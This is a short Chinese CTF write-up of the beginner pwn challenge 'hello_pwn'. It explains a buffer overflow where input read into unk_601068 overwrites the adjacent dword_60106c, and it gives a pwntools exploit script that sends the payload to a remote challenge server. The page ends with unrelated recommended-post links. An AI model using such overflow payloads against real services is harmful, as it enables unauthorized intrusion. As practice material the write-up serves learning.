新手练习04-hello_pwn

image.png
image.png

可以看到unk_601068跟dword_60106c是连在一起的,所以只需要在read处溢出unk_601068覆盖dword_60106c为0x6E756161即可
exp:

from pwn import *
# p = process('./hello_pwn')
p = remote("111.198.29.45","31004")
payload = 4*'a' + p32(0x6E756161)
p.sendline(payload)
p.interactive()
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • Lua 5.1 参考手册
    Lua 5.1 参考手册 by Roberto Ierusalimschy, Luiz Henrique de F...
    苏黎九歌阅读 13,918评论 0 38
  • 大暑日记
    从农村来到这个城市,二十年过去了,城市变大了,人也变老了。而一年一度的七月大暑不变,火辣的太阳又勾起我对一些辛酸的...
    豪宇峰阅读 456评论 0 0
  • 妈的
    你无所事事, 但并不清闲自在你没吃过苦, 可也没享到什么福你知道, 没有努力就没有资本主义天太黑灯光太艳你愤愤地嘟...
    亲爱的尾巴阅读 151评论 0 0
  • 52个令人叫绝的心理学效应——清醒思考的艺术
    本文整理自《清醒思考的艺术》 关于本书作者: 这本书的作者罗尔夫·多贝里是一位德国的经济学博士,也是瑞士益得书摘(...
    爱丽丝的学习笔记阅读 3,204评论 2 10